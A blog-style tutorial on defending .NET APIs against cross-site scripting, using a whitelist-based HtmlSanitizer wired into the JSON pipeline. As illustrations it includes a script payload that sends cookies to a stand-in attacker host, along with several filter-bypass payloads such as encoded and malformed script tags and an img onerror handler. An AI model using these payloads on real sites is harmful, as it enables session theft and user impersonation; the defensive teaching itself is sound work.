🔐 Security in .NET: Preventing XSS (Cross-Site Scripting)
Modern web applications must treat user input as untrusted. One of the most common vulnerabilities developers face is XSS (Cross-Site Scripting).
If not handled properly, attackers can inject malicious JavaScript into your application to:
- Steal session cookies
- Impersonate users
- Modify UI content
- Execute unauthorized actions
- Redirect users to malicious websites
In this article, we will explore:
- ✔ What XSS is
- ✔ Why Regex-based protection fails
- ✔ Professional solution using HtmlSanitizer in .NET
- ✔ Automatic protection using JsonConverter
1️⃣ What is XSS (Cross-Site Scripting)?
XSS (Cross-Site Scripting) is a security vulnerability where attackers inject malicious scripts into webpages or APIs.
These scripts execute in the browser of other users without their knowledge.
The Attack Example
Imagine a Product API where users submit a product description.
Normal Input
A nice blue shirt.
Malicious Input
<script>
fetch('https://hacker.com/steal?cookie=' + document.cookie)
</script>
What Happens Next?
- Browser detects the <script> tag
- JavaScript executes automatically
- Attacker steals the Admin session cookie
- Attacker may impersonate the Admin
⚠️ Root Problem: We treated user input as safe data, but it actually contained executable code.
2️⃣ Why Simple Regex Protection Fails
Many developers try to prevent XSS using Regex patterns like:
<.*?>
or by replacing suspicious keywords such as:
javascript:
Unfortunately, attackers can easily bypass Regex filters.
Common Bypass Techniques
Encoded Payload
%3cscript%3ealert(1)%3c/script%3e
Malformed HTML
<scr<body>ipt>alert(1)</scr<body>ipt>
Event-based Injection
<img src="x" onerror="alert(1)">
Why Regex Fails
Regex cannot fully understand HTML structure. HTML is not a regular language — it contains nested elements, attributes, encodings, and edge cases.
Trying to block XSS using Regex becomes:
- ❌ fragile
- ❌ incomplete
- ❌ difficult to maintain
This approach is called Blacklisting, and it is an endless guessing game.
3️⃣ Professional Solution: Whitelisting Approach
Instead of trying to detect "bad" content, we allow only known safe content.
This approach is called Whitelisting.
We use a DOM-based parser that understands HTML just like a browser.
Step A: The Brain — HtmlSanitizer
We use the HtmlSanitizer library to safely parse HTML and remove unsafe elements.
Allowed formatting tags:
- <b>
- <i>
- <u>
- <strong>
- <em>
- <p>
- <br>
Everything else is removed automatically.
XssSanitizer Implementation
using Ganss.Xss;
namespace ProductApi.Middleware;
public static class XssSanitizer
{
private static readonly HtmlSanitizer _sanitizer;
static XssSanitizer()
{
_sanitizer = new HtmlSanitizer();
_sanitizer.AllowedTags.Clear();
_sanitizer.AllowedTags.UnionWith(new[]
{
"b","i","u","strong","em","p","br"
});
_sanitizer.AllowedAttributes.Clear();
_sanitizer.RemovingTag += (s, e) =>
{
// log removed tag attempt
};
}
public static string Sanitize(string input)
{
if(string.IsNullOrWhiteSpace(input))
return input;
return _sanitizer.Sanitize(input).Trim();
}
}
Step B: Automatic Protection using JsonConverter
Developers often forget to call Sanitize().
To ensure protection everywhere, we integrate sanitization directly into the JSON pipeline.
Now every string received by the API is automatically cleaned.
XssSanitizerConverter Implementation
using System.Text.Json;
using System.Text.Json.Serialization;
public class XssSanitizerConverter : JsonConverter<string>
{
public override string? Read(ref Utf8JsonReader reader,
Type typeToConvert,
JsonSerializerOptions options)
{
var value = reader.GetString();
return value == null
? null
: XssSanitizer.Sanitize(value);
}
public override void Write(Utf8JsonWriter writer,
string value,
JsonSerializerOptions options)
{
writer.WriteStringValue(value);
}
}
Step C: Register in ASP.NET Core Pipeline
builder.Services.AddControllers()
.AddJsonOptions(options =>
{
options.JsonSerializerOptions.Converters
.Add(new XssSanitizerConverter());
});
4️⃣ Defense in Depth Strategy
Security should never rely on a single layer.
-
Tag Whitelisting
Only safe formatting tags are allowed. -
Attribute Stripping
Blocks hidden attacks like:
Since attributes are removed, the attack fails.<img src="x" onerror="alert(1)"> -
Logging Suspicious Activity
We can detect attempts to inject:
- <script>
- <iframe>
- <object>
5️⃣ Summary Comparison
| Stage | Status | Strategy |
|---|---|---|
| Original | ❌ Vulnerable | Regex filtering |
| Improved | ✅ Secure | Whitelist HTML parsing |
| Integration | ✅ Automated | JSON pipeline sanitization |
6️⃣ Key Takeaways
- ✔ Never trust user input
- ✔ Regex is not reliable for HTML sanitization
- ✔ Prefer whitelist-based validation
- ✔ Use DOM-based parsers
- ✔ Automate security wherever possible
7️⃣ Where to Use This?
- Product descriptions
- Blog comments
- User profiles
- CMS editors
- Feedback forms
- Chat applications
- Review systems
Comments
Post a Comment